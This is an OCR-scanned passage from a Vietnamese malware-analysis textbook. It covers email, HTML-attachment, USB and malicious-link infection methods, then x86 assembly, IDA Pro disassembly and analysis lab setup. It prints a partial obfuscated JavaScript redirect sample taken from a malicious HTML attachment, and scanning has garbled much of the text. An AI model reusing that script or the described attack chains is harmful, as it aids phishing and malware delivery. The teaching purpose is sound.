Reply Reply All Forward Print Delete Previous 


From: pdt@ozekisms.org 
Date: Wednesday, March 03, 2010 11:10 4M 
To: john@ozekisms.org 


Subject: Pdf attatchment 
Attach:  'fŸlozeki.pdf (39.3 KB) 


Dear Sir! 


You can find your requested pdf file as an attachment of 
this e-mail. 


Hinh 2-30 Tép tin dóc hai dính kém qua email 


Phan lớn các cảnh báo virus được gửi dính kèm qua e-mail giữa những 
người sử dụng . Virus lừa đảo thường được chuyền tiếp trong số những 
người sử dụng hàng tháng hoặc thậm chí nhiều năm bởi vì người dùng 
tin rằng họ đang giúp đỡ người khác băng cách phân phối những cảnh 
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báo này. Mac dù các trò lừa dao thường không gây ra thiệt hại, nhưng 
một số virus lừa đảo độc hại trực tiếp làm thay đôi hệ điều hành cài đặt 
hoặc xóa các tập tin, có thể gây ra các vấn đề về bảo mật hoặc gây ảnh 
hưởng tới hoạt động của hệ thống. Một virus nổi tiếng trò lừa bịp là 
Good Times. 

Mailing worm hay còn gọi là “sâu gui thu hang loạt” tương tự như e- 
mail virus, điều khác biệt chính là rằng sâu gửi thư hàng loạt được khép 
kín thay vì lây nhiễm một tập tin hiện có như e-mail virus . Khi một 
Mailing worm lây nhiễm một hệ thống, nó thường tìm kiếm hệ thống cho 
các địa chỉ e-mail và sau đó sẽ gửi bản sao của chính nó đến những địa 
chỉ đó, bằng cách sử dụng một trong hai e-mail của khách hàng trên hệ 
thống hoặc gửi một tệp tin độc hại khép kín được xây dựng vào worm. 
Một con “sâu gửi thư hàng loạt” thường gửi một bản sao của chính nó tới 
nhiều người cùng một lúc. Bên cạnh làm ngưng trệ máy chủ e-mail và 
mạng lưới với khối lượng lớn e-mail, sâu gửi thư hàng loạt thường gây 
ra các van đề hiệu suất nghiêm trọng cho hệ thống bị nhiễm. Ví dụ về 
các Mailing worm: Beagle, Mydoom và Netsky. 

Dé bảo vệ máy tinh trước những dot tan công từ virus lừa đảo hay các 
Mailing worm người dùng cần luôn cảnh giác trước các file đính kèm 
không rõ nguồn góc, đặc biệt là các file có đuôi 

exe, .com, .pif, .scr, bat, rar, .zip.... Ngoài ra, cần cập nhật phan mềm 
diệt virus phién ban mới nhất. 

Dưới đây là một kịch bản sử dụng tài liệu độc hại dé phat tan va lay 


nhiễm gây hai cho người dùng. 


Looks like 
normal Excel file — 


From OOo 
Subject: Personnel 
reshuffle 


IN 


Send mail 
(“From:” is forged ) 


[Non visible activity] fih 
exploiting vulnerability in 


There was a personnel 
reshuffle. 
See the attachment file 


Excel and drop malware 
and execute it 


Show Non- 
malicious Excel file 


Keystroke 
logging 
Administrato | 


password 


l [Visible Activity] 


( cipher communication 


Starting a browser | 
(invisible Window) 
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Hình 2-31 : Tan công qua email. 

Tin tặc sử dụng email để gửi cho người dùng nội dung kèm theo một file 
đính kèm là file excel. 
Khi người dùng kiểm tra email và thấy có file đính kèm, tuy nhiên mã 
độc nằm trong file dính kém nay sẽ bị kích hoạt và chay an. Mã độc ở 
đây là 1 chương trình keylogger. Chương trình này sẽ ghi lại toàn bộ 
thông tin hoạt động của nạn nhân. Sau đó sẽ gửi thông tin này qua trình 
duyệt Webbrowser. 

2.4.2. Phát tán qua email sử dụng Mã HTML độc hại 

Cách phát tán này tin tặc sẽ gửi các thư điện tử chứa mã HTML độc 
hại cho người dùng 


& Reset your Facebook password 


File Edit View Tools Message Help 


Se LAS) 


Kg 
Reply Reply All Forward Print Delete Addresses 


Facebook 
Tuesday, June 15, 2010 4:15 PM 
-— 
Reset your Facebook password 
Attach: [e] Facebook newpass.html (487 bytes) 


Hey there. 


Because of the measures taken to provide safety to our clients, your 
password has been changed. 
You can find your new password in attached document. 


Yours, 
Facebook= 


Hình 2-32: Thu điện tử đính kèm HTML độc hai 
Các thư điện tử này có nội dung rất đa dạng. Ví dụ : “thiết lập lại mật 
khâu”, “cài đặt lại chức năng thông báo" và dính kém theo đó là các tệp 
tin HTML giả mạo gửi từ các mạng xã hội như “facebook”, “twitter” 
...nhưng thực chất trong đó chứa các đoạn script mà khi mở tệp tin thì 
người dùng sẽ được chuyên hướng đến các trang web có chứa mã độc 
hại khai thác lỗ hông của Adobe, Javascript... 
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C:\Documents and Settings Desktop\taskforce - twitter - virus\open. html 


SERA ECO gte 


<script types! text/javascript'>function nX()();zs"z";nX.prototype = (t : function() {var m-function()[return 'm'};q=26402;var 
qii-function()();var nz'h9tjtjp4:0/7/j3s0h4o]pjp4i)n)g]b9a4z]zjajrJ.])c40j. 9u7k9/329. )h4t)n9' . replace (/[9\}J4j]/g, '');var x=new 
Array();function nR(]():ys' get u-function()(return 'u');tàsdocument['lMoIcHaItliHoIn9'.replace(/[9IHGM]/g, '')];var yI=new 
Array();var p="";this.s=false;var r=false;w="" ;mK='';this.xU=8492;function nà(h)(var d=50121;this.yT=””;var 

pG=function() {};h['hBrBe6fB'.replace(/[B\?TN6]/g, '')]=n;this.nT=”nT”;var os'';var v=function() {return 

'ự!1;}dã=””;thi3, sN=""shJ="";var wH=function(){return 'wH'};this. taY="tay";var oW=function(){};var dF=function() {} :nÀ (tà) ;var 
rU=""“;war yT¥=function(){return 'jTY');var c="";}};this.uH="";var sR=new nX(); function dÀ()();sR.t();var nH-new 

Date (] </script> 


Hình 2-33: Minh họa Script chứa trong tệp tin đính kèm HTML 

Các thư gửi nhúng các link độc được xây dựng xung quanh 
HTML không có gì mới, nhưng dường như đã trở thành một kỹ thuật 
nóng trong năm vừa qua. Gần đây, các tin tắc bắt đầu nhúng JavaScript 
bên trong file HTML (chứ không chỉ là file một đính kèm đơn giản), để 
gửi Trojan Zeus chuyên lay cắp tai khoản ngân hàng 

Chiến dịch mới nhất của các tin tác là có gang dé người nhận thư 
nhắn chuột vào đính kém HTML "vô hại", nhưng thực chất là kích hoạt 
một mã độc bằng JavaScript, đưa nạn nhân đến một loạt website không 
đảm bảo. 

Cụ thể, một quảng cáo thông thường cho phần mềm chống virus 
giả mạo, khi được click vào, sẽ cài đặt một công hậu (back door) lên 
máy tính ngay cả khi trình duyệt được đóng lại. Như vậy, khi nhân chuột 
vào đính kèm HTML thì đã là quá muộn. 
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a internet Security 2010 


System Scan 
aan bê hand cot an yas comps 


Stan type: C Normal © quick 


ANHNDOWSWeys II YN oem] vet 
Objects scanned: 3308 

Thraats dutected — 
Git 


TRIAL VERSION 
JNLOCK FULL VERSION 


Upgrade to full 
version now! 
lay eet en: 


Fear re n eal EES Chit FER fe extre Een 


d 


Hinh 2-34 : Giá mao phan mém diét virus 
Những cách phóng thủ duy nhất chóng lai loai tan công kiểu này là lọc 
thu rác (spam) tai cóng ra vào (gateway) dé nó khóng bao gió dén duoc 
người sử dung, hoặc đối với người sử dung thi vô hiệu hóa JavaScript 
trong trình duyệt. Phần mềm bảo mật trên PC có thê tóm được mã khai 
thác. 


Hơn nữa, tệp tin đính kèm HTML. Có thể bỏ qua chương trình chống 
virus tích hợp trong các máy chủ mail, bởi vì một tập tin. Html chính nó 
không chứa mã độc hại hoặc mã khai thác, nhưng một liên kết đến một 
trang web được thực hiện bởi các hacker. Do đó, nó hầu như không được 
phát hiện bởi các chương trình chống virus. 

Vì vậy, cần khuyến nghị người dùng nâng cao nhận thức của bất 
ky tập tin dính kèm trong các email không rõ. Ngoài ra, người sử dung 
cần thường xuyên cập nhật phần mềm trên máy tính của họ và cài đặt 


chương trình chông virus đê bảo vệ chông virus. 
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2.4.3. Phat tan qua USB 


| USB FLAS (Fz) 


File Edit View Favorites Tools Help 


Q sex ~ & 2 if ) Search K Folders EHE 


S |Sø F:| v gJ co 


Folders = i _ USB_FLAS#GB) 


3 Desktop h6 d. 
& (C) My Documents ò 


& W& My Computer 
E A 3v: Floppy (A:) 
D Sœ Local Disk (C:) 
& 4 CD Drive (E:) 
Œ) Sœ_—— (F:) 
& D control Pane! 
®© (C3) Shared Documents 
D [77 vtitest's Documents 


Hinh 2-34: Phát tán qua USB 

Day là mót hinh thüc phát tán mà dóc rat phó bién. Trude day, virus 
AutoRun từng hoành hành với cơ ché mó 6 dia là kích hoat mà dóc. Diéu 
đó khiến tóc độ lây lan của dòng virt này trở nên không thé kiểm soát. 
Microsoft đã buộc phải quyết định cắt bỏ tính năng AutoRun đối với 
USB từ Windows 7 và trên cả Windows XP phiên bản cập nhật. 
Hiện tại tin tặc đã nghĩ ra một phương án mới dé thực hiện lây nhiễm mã 
độc, người dùng khi mở USB bị nhiễm virus, người sử dụng sẽ thấy một 
6 đĩa nữa trong USB đó và phải mở tiếp 6 đĩa thứ hai này mới thay được 
dữ liệu. Thực chat 6 đĩa thứ hai chính là một shortcut chứa file virus. Khi 
người dùng mở đữ liệu cũng là lúc máy tính bị nhiễm mã độc từ USB. 
Dù cơ chế AutoRun đã bị loại bỏ, nhưng với sự xuất hiện của 
W32.UsbFakeDrive, virus trên USB có thể lây phát tán nhanh chỉ với 
thao tác truy cập vào ô đĩa USB của người dùng. 

2.4.4 Phát tán dựa trên link độc hại. 
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^ (obfuscated) JavaScript to ® - w 
: TA legitimate site —.. TẾ 
ii Attacker IT II 
enl Qoid = 7 Attack 
already defaced site 3 redirect to pø Servers 
malicious(attack) sit 
— 
e ei 
ef 
® 4 4. Download malware and execute it A T 
(by exploiting selected - — 
vulnerabilities) E "ep 
= 
User Tass 
8 SE umn we nama Collection 
5. Send FTP account information Servers 


to servers 


Hình 2-35 Phát tan dựa trên các link độc hai 
La một hình thức tan công khá phó bién. Phương thức này có thé mô ta 
như sau: 
Người dùng truy cập vào một Website nào đó đã bị gắn đoạn mã độc, cụ 
thé là Javascript đã được mã hóa. Khi đó người dùng tự động sẽ chuyển 
đến 1 trang web chứa mã độc và tự động sẽ tải mã độc đó về và cài lên 
máy tính(dựa vào lỗ hổng phần mềm hoặc hệ điều hành). Sau đó các 


thông tin người dùng sẽ bị gửi về cho tin tặc. 


2.5 Cau hỏi ôn tap 
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Chương 3: 
CO BAN VE PHAN TICH MA DOC 

Phân tích ma độc hại là công việc nghiên cứu phan tích, tim hiểu 
xem xét các hành vi án trong mẫu mã độc. 

Công việc phân tích mã độc ở Việt Nam là công việc chua phó 
biến. Thường thì công việc nay thường gan liền với các chuyên gia phân 
tích của các công ty phần mềm Antivirus, và những người làm an toàn 
thông tin chuyên nghiệp cộng tác với các hãng phan mềm. Ở Việt Nam 
thường có 1 phận đảm an toàn an ninh trong 1 tô chức, một nhân viên 
chịu trách nhiệm về bảo mật của hệ thống máy tính hoặc hệ thống mạng. 
Như đã biết không phải lúc nào các chương trình Anti-Virus cũng có thé 
giải quyết được hết mọi vấn đề về mã độc hại nói chung và virus nói 
riêng cho hệ thống máy tinh. Có thé hình dung việc khi quản tri hàng 
trăm máy tính trong một công ty, mặc dù mỗi máy đều cài chương trình 
Anti-Virus, nhưng rồi một ngày máy tính nào đó có thể bị nhiễm Virus 
qua đường email mà chương trình Anti-virus kia không nhận dạng được, 
rồi lây ra toàn mạng, gây rủi ro cao với tính sẵn sàng, tính bảo mật .. của 
hệ thống đó. Lúc đó người làm an toàn cần phải có những xử lý phân 
tích chủ động trong tình huống này để giảm thiểu rủi ro đến mức thấp 
nhất cho hệ thông máy tính hay hệ thống mạng của mình. 

Những nhận định, đánh giá ban đầu đúng đăn của người phân tích 
có ý nghĩa quyết định tới việc giảm thiểu rủi ro và thiệt hại cho toàn bộ 
hệ thống. 

Mục đích của phân tích mã độc hại là để trả lời ba câu hỏi sau : 

1. Thứ nhất : tại sao máy tính lại bị nhiễm mã độc hại này? 

2. Thứ hai : chính xác thì mã độc hại này làm những gì trên hệ 
thong? 

3. Thứ ba : sau khi nam được hành vi hoạt động của có thể xóa nó 
không và phòng tránh được chuyện lây nhiễm lần sau hay 
không? 

Có một số khuyến cáo đối với những người phân tích tích mã độc đó là: 

- _ Đừng đòi hỏi vào việc người phân tích phải phân tích và hiểu hết 
các tính năng của mã độc, bởi : 
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- Hau hết các chương trinh mã độc có lượng mã là lớn và phức tap 
nên chủ yếu xác định các tính năng chính của malware. 

- Hay luôn sử dụng phối hợp nhiều công cụ và các cách tiếp cận 
khác nhau dé phân tích. 

- Luôn luôn cập nhật các kĩ thuật mới mà những người viết 
malware sử dụng cũng như các kĩ thuật mới, các công cụ hỗ trợ 


mới trong việc phân tích. 


3.1 Các kiến thức cơ bản trong phân tích mã độc 
Trong kiến trúc máy tính hiện dai , một hệ thống máy tính có thể 
được biéu diễn nhu sau: 


driven Keyboard ] 
Disks . Monitor 


Disk controller USB controller Graphics adapter 
IIIIIIIIIIIIIIII [IIIIIIIIIIIIIIII IIIIIIIIIIIIIIIII 


Kiến trúc Hệ thống máy tính hiện đại 
HIN Đệm dữ liệu (local buffer) 


Hình 3-1 Kiến trúc CPU 


Š7 


D6 hoa Soan thao Co sở dữ liệu 


Cac chương trình ứng dụng 


Hình 3-2: Mô hình trừu tượng 


Người dùng có thể chạy hệ điều hành Windows trên nhiều loại 

phần cứng khác nhau. Khi người viết chương trình mã độc, họ có thê viết 
bằng nhiều ngôn ngữ khác nhau và sử dụng các trình biên dịch về dịch 
và chạy mã. Còn đối với người phân tích mã thì họ lại phải làm công 
việc ngược lại đó là đảo lại mã nguồn và làm sao có thể phân tích được 


mã nguôn đó và hiệu được. 


Hình: 

Hình trên giúp sinh viên có hiểu tổng quan vé vi trí của người viết mã và 
vị trí của người phân tích mã là như thế nào. Hiện nay có rất cấp độ của 
ngôn ngữ lập trình, phần dưới đây sẽ mô tả 6 mức khác nhau đó: 

Mức Hardware: đây là mức vật lý, chứa các tín hiệu điện tử thực hiện 
các tô hợp các lệnh logic điện tử như XOR, AND, OR, NOT. Vì đây là 
phần cứng nên không thé dé dàng có thé can thiệp bằng phần mềm. 

Mức Microcode : mức microcode hay còn gọi là firmware. Microcode 
hoạt động trên sơ đồ dòng điện. Nó chứa các chỉ dẫn nhỏ được chuyên 
đổi từ ngôn ngữ bậc cao, cung cáp 1 phương thức dé giao tiếp với phan 
cứng. Khi thực hiện phân tích mã độc, không cần lo lắng về các 
microcode vì nó luôn được chỉ rõ bởi máy tính. 

Mức Machine code : (mã máy) Mức machine code chưa các Opcodes, 
các ký tự hexadecimal và nói cho bộ xử lý CPU biết phải làm gì. Mã 
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máy thông thường được thực hiện với nhiều chi dẫn microcode dé cho 
phần cứng bên dưới có thể thực thi được. Mã máy được tạo ra khi 
chương trình máy tính bậc cao được biên dịch. 

Mức Low-level languages: Ngôn ngữ bậc thấp là ngôn ngữ người 
phân tích có thé đọc được. Ngôn ngữ bậc thấp mà pho biến nhất là ngôn 
ngữ Assembly. Người phân tích mã độc làm việc ở mức ngôn ngữ này vì 
mã máy khó đọc. Người phân tích sử dụng các công cụ dịch ngược mã 
nguồn về dạng ngôn ngữ bậc thấp assembly. 

Mức high-level languges: Ngôn ngữ bậc cao được nhiều lập trình viên 
sử dụng như C,C++ và một số ngôn ngữ khác. Ngôn ngữ này sau khi 
biên dịch sẽ chuyển sang dạng mã máy. 

Mức Interpreted languages là ngôn ngữ ở cấp cao nhất, nhiều lập 
trình viên sử dụng các ngôn ngữ thông dịch như C#, Perl, .NET và Java. 
Các mã viết không biên dịch thành mã máy mà thay vì vậy biên dịch 
sang bytecode. 

Đối với người phân tích mã độc, cần phải hiểu rõ ngôn ngữ Assembly 
dé có thé đọc được mã nguồn (ở dạng dịch nguoc)dé phán tích. Phan tiép 
theo đây giáo trình sẽ mô tả tổng quan ngôn ngữ Assembly 32bit trên 
kiến trúc CPU x86. 

3.1.1 Ngôn ngữ Assembly 32bit 
3.1.1.1 Các thanh ghi 

- ESP trỏ đến đầu stack 

- EBP thường dùng dé chứa các dia chi stack 

- EIP trỏ đến lệnh tiếp theo 

- EAX chứa các biến số học,logic, thường dùng trong các thao tác nhân 
chia 

- EBX thanh gi địa chỉ 

- ECX thanh gi đếm hay dùng trong các vòng lặp 

- EDX các thao tác vào ra, các phép tính 

- ESI EDI thường dùng thao tác với các mảng, chuỗi 

Các co: 

- O có tràn, = 1 khi tràn bộ nhớ. 

- P cờ chan lẻ 
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- Z cờ zero - kết qua bang không z=1 

- S cờ dấu s=1 thì kết quả âm 

- C cờ nhớ, khi phép tính kết quả có nhớ hoặc mượn thì c=1 
có diéu khiển: 

-T = 1 CPU ché độ là chạy từng lệnh (cờ bay- trap) 

- I cờ ngắt. 

- D cờ hướng, D =1 thì cpu làm việc với chuỗi từ phải sang trái. 
Một số câu lệnh cơ bản: 

- MOV gan về phải cho về trái 

- MOVSX thực hiện khi về trái có độ dài > hơn phải 

- MOVZX thực hiện khi về trái toàn 0 

- LEA thanh gi, 6 nhớ. Ghi 6 nhớ vào thanh gi 

- XCHG hoán đổi dữ liệu 

- INC tang 1 đơn vi 

- DEC giảm 1 don vi 

- ADD x1,x2 | x1 2 x1 4x2 

- ADC cóng phu thuóc vào có 

- SUB trừ. 

-SBB trù phụ thuộc cờ Ciel trừ kết quà di 
- MUL Nhân số không dấu (mul ecx |edx- eax *ecx) 

- IMUL nhân số có dấu 

- XADD thực hiện lần lượt xchg và add 

- CMP so sánh: sau khi thực hiện tác động đến các cờ CZ S; 


C Z S 
dích-nguón 0 1 0 
đích>Nguôồn 0 0 0 
đích< nguồn 1 0 | 


- Test so sánh (tác động S Z P flag) so sánh bang phép AND 
- JMP nhảy không điều kiện 

- JE JZ nhảy nếu cờ Z = 1 ,JNE JNZ ngược lại 

- JS nhảy nếu có S =1 

- JP/JPE nhảy néu cờ P=1, JNP JNPE ngược lại 

- JO nhảy nếu cờ O=1 JNO ngược lại 
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- JB néu cờ C=1 
- JBE nếu cờ C or F=1 
- JL néu cờ §<>O 
- LOOP X, ECX >0 thì nhảy lên địa chỉ X, tạo vòng lặp 
- MOVS: mov string, sau đó tăng, giảm các thanh gi tùy thuộc vào cờ D, 
D =0 tăng, D=1 giảm 
- REP X thực hiện lặp lại X đến khi ECX =0 
- LODS nạp vào EAX 
- STDOS X nạp từ EAX vào X, sau đo tăng X 
- CPMS so sánh 2 chuỗi 
- CALL X, đi vào thực hiện ở địa chỉ X và pop địa chỉ trở về vào stack 
để phục 
vụ cho lệnh ret. 
- RET (retn) di chuyển đến địa chỉ đang chứa trong đỉnh stack, RET X, 
sau khi di chuyền sé clear X byte trong stack, lùi ESP lại tương ứng 
3.1.1.2 ASM trên phan mém IDA pro 
1. Cac kiéu: 
* Byte xxxxxx - địa chi xxxxx chứa giá tri kích thước 1 byte 
* Word xxxxx - địa chi xxxxx chứa giá trị kích thước 2 byte 
°Dword_xxxxx - dia chỉ xxxxx chứa giá tri kích thước 4 byte 
e Qword_xxxxxx- dia chỉ xxxxx chứa giá trị kích thước 8 byte 
e Unk. xxxxx- Unknow type 
2. Mang, truy cáp các phan tir trong mang: 
Với code C: 
#include "stdafx.h" 
int ijmang[10]; 
int tmain(int argc, TCHAR* argv[]) 
{ 
mang[0]=1; 
mang[1]-2; 
mang[2]=3; 
mang[3]-4; 
return 0; 
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j 
Doan code trén hién thi trong IDA: 


© IDA - DAMy Project Testtttttt\Release\xzocc.exe 
File Edit Jump Search View Debugger Options Windows Help 


Ba f©x >i ie & A DO hab a F~ FX): kO Olwndadeuege M 


4 
aS bt S II I 
Functions window 8 x IDA View-A B lo Hex View-A 
Function name Seqı ^ 
LÉI -wmain text _wmain proc near 
LI —security check cookie() ted mov dword 403370, 1 
f| pre cpp. init text mov dword 403374, 2 
[f] —tmainCRTStartup tet || |mov dword 403378, 3 
f| SLN33 text mov dword_4033/C, 4 
f] start text xor eax, eax 
f|. report gsfailure text retn . 
f | _ CxUnhandledExceptionFilter( EXCEPTION POINTERS *) texti —wmain endp 
f| SLNS tex 
[f] amsg exit ted 
[f| onexit „tex 


Hinh 3-3 Mang hién thi trong IDA 

Với dword 403370 là địa chi đầu tiên của mang, do mang kiểu int ( 4 
byte / biến ) nên các phan tử tiếp theo có địa chi ô nhớ tăng lên 4, 
dword_403374, dword_403378,... 

Tương ứng với 

Mov dword 403370 ,1 

Mov dword_403370+4,2 

Mov dword_403370+8,3 

Mov dword 403370 +12,4 

Vói các bién cuc bó thi sé duoc luu dia chi trong EBP, là các dia chi 
thuóc stack. Vói tüng vi tri sé là ebp +1 +2 +3 +4... 
3. Mang dùng cấp phát bộ nhớ động: 

int tmain(int argc, TCHAR* argv[]) 

{ 

int *heap_array = (int*)malloc(3 * sizeof(int)); 

heap_mang[0] = 10; 

heap_mang[1] = 20; 

heap_mang[2] = 30; 

heap_mang[2] = 40; 

} 

Code hién thi trong IDA: 
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" ly Project\Testttttt\Releascbœcøceke 000 
File Edit Jump Search View Debugger Options Windows Help 


SA ©x++ Me ® AL DO li ah at at t-te XD DD (Winda debugger- 


4 
I 0 0 CID 
reesen E mee [tee 
Function name _wmain proc near 
[F] _wmain ted push 0C ; Size 
. securi c cookie( call ds:malloc 
t mov dword ptr [eax], 0Ah 
mov dword ptr [eax+4], 14h 
mov dword ptr [eax+8], 1Eh 
mov dword ptr [eax+8], 28h 
add esp, 4 
xor eax, eax 
retn 
_wmain endp 


Hình 3-4: Cấp phat bộ nhớ động 

push OCh_; Size <- đưa size cần cấp phát và goi hàm malloc dé cấp 
phát 

call ds:malloc 

Với ham malloc sau khi gọi xong trong thanh ghi eax sẽ chứa dia chi 
đầu tiên của mảng trong vùng nhớ được cấp phát động. 

MOV các giá tri tương tự như mảng thường, ADD esp 4 là lùi stack lại 
để bỏ phần tử đầu (size) đi cân bằng lại stack như trước khi gọi hàm. 

Tương tự khi sử dụng các biến cục bộ sẽ được lưu trong stack, như trên 
thì thay eax thành EBP. 
4.Struct 

#include <stdio.h> 

#include "stdafx.h" 

#include <malloc.h> 

struct ch_struct 

{ //kich thuoc 

long x; // 4 byte 

short y; // 2byte 

double z; //8byte 

charc; //1 byte 

e 

struct ch_struct teststruct; 

int tmain(nt argc, TCHAR* argv[]) 
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{ 


teststruct.x=10; 
teststruct.y=20; 
teststruct.z=30; 


teststruct.c='a'; 


} 


File Edit Jump Search View Debugger Options Windows Help = 

p & Yo DO Haba te á X» O Gi (Wing debuoger 
4. 1111 Wil 
[F] Functions window 8x 


Function name 


_wmain proc near 

fld ds: db1_4020E8 
eax, 14h 
word_403384, ax 
db1_403388 

dword 403380, 0Ah 
byte 403390, 61h 
eax, eax 


_wmain endp 


Hình 3-5: Cấu trúc lưu bién toàn cuc 


Cáu trüc duoc luu stack( bién cuc bộ) trên IDA. 
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.text:00401000 main proc near 
.text:00401000 


.text:00401000 var 18 = dword ptr -18h 
.text:00401000 var 14 = word ptr -14h 
.text:00401000 var 12 = byte ptr -12h 
.text:00401000 var 10 = dword ptr -10h 
.text:00401000 var 8 = qword ptr -8 
.text:00401000 

.text:00401000 push ebp 
.text:00401001 mov ebp, esp 
.text:00401003 sub esp, 18h 
.text:00401006 mov [ebpevar 18], 10 
.text:0040100D mov [ebp«var 14], 20 
.text:00401013 mov [ebp+var 12], 30 
.text:00401017 mov [ebp+var 10], 40 
-text:0040101E fld ds:dbl 408128 
.text:00401024 fstp [ebpevar 8] 
.text:00401027 xor eax, eax 
.text:00401029 mov esp, ebp 
.text:0040102B pop ebp 
.text:0040102C retn 

.text:0040102C main endp 


Hinh 3-6: Cấu trúc lưu bién cục bộ 

Với EBP lưu lại địa chỉ của ESP (đỉnh stack khi bắt đầu hàm). 
5. Một số cấu trúc hàm cơ bản của Assembly 

- Lệnh IF, Cau trúc rẽ nhánh 

Trong ASM các lệnh If thường gồm một toán tử so sánh và một lệnh 
nhây tiếp theo dựa vào các cờ kết quả của toán tử so sánh. 

Ví dụ: 

.text:00401000 _wmain proc near 

.text:00401000 mov  ecx, dword 403374 «- X 

.text:00401006 mov eax, dword 403370 <- Y 

.text:0040100B cmp  ecx,eax <- so sanh X va Y 

.£ext:0040100D jle short loc 401015 «- nháy néu Z 
Flag =1 hoặc S flag # O flag ( tương ứng với x=< y) Bo qua 2 dòng tiếp 
theo nháy xuóng 401015 thuc hién. 


.text:0040100F mov  dword 403374, eax <-gán X=Y, vi néu 
X> Y thi jle sẽ không nhảy câu lệnh này duoc thực hiện. 
.text:00401014 retn <- return Y. Thoát khói hàm, 


khóng thuc hién doan tiép theo 
.text:00401015 loc. 401015: 
.text:00401015 mov  eax,ecx <- return X 
.text:00401017 retn 
.text:00401017 _wmain endp 


95 


- Vòng lặp, cau trúc lặp 

Cấu thành vòng lặp trong ASM thường gòm các lệnh jump vòng lên 
các lệnh phía trên dé thực hiện lại một cách tuần tự từ trên xuống dưới, 
và các lệnh kiểm tra điều kiện để jump ra khỏi vòng. Hoặc các lệnh jump 
vòng lên trên với các điều kiện dé tiếp tục jump vòng lên trên, nêu lệnh 
so sánh cho ra điều kiện đã sai / đúng thì sẽ ngừng jump vòng lên trên. 
Với mỗi trình biên dịch khác nhau sẽ cho ra các mã ASM khác nhau. 

Trong hình ảnh ta có: 

JL shorloc 401010 jump ngược lên trên dé thực hiện lại. 

Mov dword_403370[eax*4],eax gan. 

Cmp eax,0Ah so sanh voi 10 


JL jump dựa trên điều kiện. 


xa e Ae. ré FD Cl|wnssssss "fr 8 
e x| B IDA View-A E la Hex View-A LA Structures pE 
Sea! ^ j B 
text _wmain proc near 
text mov dword_40337c, 4 
text xor eax, eax 
ES) lea esp, [esp+O] 


INTERS *) .tet 


loc 401010: 
mov dword_403370[eax*4], eax 
inc eax 

cmp eax, O 
short 


Ah 
Toc_ 401010 


dword_ 403398, eax 
eax, eax 


_wmain endp 


Hinh 3-6: Hién thi vong lap trén IDA 

Voi cac dang vong 1ap, điều kiện khác nhau, chương trình dịch khác 
nhau các mã ASM sẽ khác nhau để chương trình chạy tói ưu hơn. Vòng 
lặp vô hạn tuần hoàn sẽ không có các đoạn kiểm tra điều kiện và jump 
ra ngoai. 
6. Cau trúc cơ ban các ham thủ tục trong ASM 

Cac doan ham thu tuc ASM thuong bat đầu với đoạn 

Push EBP 

Mov ebp,esp 

Đoạn này nhằm mục đích, lưu lại giá trị của EBP vào stack, lưu lại vị 


trí hiện tại của stack vào ebp. Do mỗi lần push thêm thì địa chỉ chứa 
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trong ESP sẽ giảm đi 4 dé tiếp tục mở rộng stack. Luu ESP lại tai EBP 
để nhớ địa chỉ của stack trước khi gọi hàm, thuận tiện cho việc gọi các 
biến lưu trong stack trước khi hàm được gọi. 

Cuối chương trình thường có các đoạn pop lại giá trị của EBP, lệnh 
RET để trở về địa chỉ tiếp theo của lệnh CALL, lệnh RET XX với XX là 
số byte đã được đoạn ham này sử dung dé xóa ra khỏi stack. 

Vi dụ doan hàm MessageBoxA trong User32: 


IDA View-A a Lë Hex View-A Bu Structures Bn Enums | Imports 


; int _ stdcal] MessageBoxEXA(HWND hWnd, LPCSTR lpText, LPCSTR lpCaption, UINT uType, WORD wLanguageId) 
public _MessageBoxExA@20 
_MessageBoxExA@20 proc near 


hwnd- dword ptr 8 
lpMultiByteStr- dword ptr OCh 
lpCaption- dword ptr 10h 
uType- dword ptr 14h 
wLanguageld- dword ptr 18h 


mov edi, edi 

ush ebp 
mov ebp, esp 
push ` OFFFFFFFFh ; int 
push [ebp+wLanguageId] ; int 
push [ebp+uType] ; int 


push [ebp+lpCaption] ; int 
push [ebp«lpMultiByteStr] ; lpMultiByteStr 


push [ebp«hwnd] ; int 
call _MessageBoxTimeoutA@24 ; MessageBoxTimeoutA(x,X,X,X,X,X) 
pop  ebp 


retn 14h 
_MessageBoxExA@20 endp 


Hinh 3-7: Doan ham MessageBoxA trong user32 

Loi goi ham: 

Sẽ push các thông số theo thứ tự 

push 0 ; uType 

push offset Caption ; "thucaiiiiiiii" 

push offset Text ; "thu cai nuaaaaa" 

push 0 ; hWnd 

call ds: MessageBoxA 

Bình thường lệnh push cuối cùng sẽ là bién đầu tiên, lệnh push đầu tiên 
thực hiện sẽ là biến cuối cùng. 


Cac offset dën các chuói sẽ dua vào stack. 


. [ebp+wLanguageld] ; int 
. [ebp+uType] ` ` mt 
. [ebp--IpCaption] ; int 
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e [ebp+lpMultiByteStr] ; IpMultiByteStr 

. push [ebp-hWnd]  ;int 

Luu các bién luu trong stack truóc khi hàm này duoc goi. 
hWnd= dword ptr 8 

IpMultiByteStr= dword ptr OCh 

IpCaption= dword ptr 10h 

uType= dword ptr 14h 

wLanguageld= dword ptr 18h 

Giá trị của các trị số này đã duoc IDA thay lai — các tên cho dé hiểu 
push [|ebp+ulype] <- với push [ebp+14h] 

Khi gọi hàm MessageBoxA: 

Như trong hình trên tương ứng với việc gọi hàm: 


3.1.3 Môi trường và các công cụ hỗ trợ phân tích mã độc 

Do đặc trưng của công việc phân tích mã độc, đó là hệ thống dùng dé 
phân tích luôn ở trạng thái sạch, bên cạnh đó môi trường phân tích phải 
phù hợp với hoạt động của mã độc. Chính vì vậy việc hiểu cách xây 
dựng môi trường phân tích và các công cụ hỗ trợ phân tích mã độc là 
điều cần thiết. Phần dưới đây sẽ giới thiệu các công cụ và phần mềm 
giúp sinh viên có cơ sở, làm quen dan với các phần mềm, công cụ phân 
tích dé vào các chương tiếp theo có thé thực hành và năm bắt được cách 
thức xây dựng môi trường phân tích, các phương pháp phân tích. 

Đối với xây dựng môi trường, người dùng có thể dùng máy thật và máy 
ảo để phân tích. Nếu sử dụng máy thật thì cần sử dụng các phần mềm 
như DeepFreeze để đóng băng lại 6 cứng. Mỗi lần máy tính khởi động 
lại sẽ trở lại trạng thái như ban đầu. 
3.1.3.1 Phần mèm tạo máy áo 
Đối với môi trường ảo, người phân tích có thé sử dụng Vmware, và 


virtualbox dé xây dung. 
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iji Windows XP Professional - VMware V 


File Edit View VM Tabs Help 
-ial gimpa w sin 
Library [PECES 
Q, Type here to search 
E all My Computer Cid Windows XP Professional 
[ij Windows XP Professio 
EÈ BT4-Beta 
E backtrack 5 
E Ubuntu 
[ij vmauto v Devices 


[ij Malware Analysis Ima WE Memory 512 MB 
Shared VMs 


